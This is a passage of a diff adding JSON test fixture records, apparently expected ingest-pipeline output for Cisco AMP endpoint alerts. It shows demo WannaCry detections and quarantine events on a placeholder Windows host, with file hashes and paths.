"Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854036408Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419179222052372000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + 
"external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419179222052372503", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854038307Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419179222052372000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419179222052372503", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854040200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419179217757405000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + 
"disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419179217757405206", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854042089Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419179217757405000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419179213462437901", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854043976Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419179217757405000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": 
"6419179204872503300", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854045878Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419179217757405000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419179217757405206", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854047755Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419179217757405000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": 
"test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419179204872503298", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854049645Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419179217757405000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419179204872503301", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + 
"host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854051576Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419179213462438000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": 
"53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419179213462437902", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854053426Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419179213462438000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419179213462437899", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + 
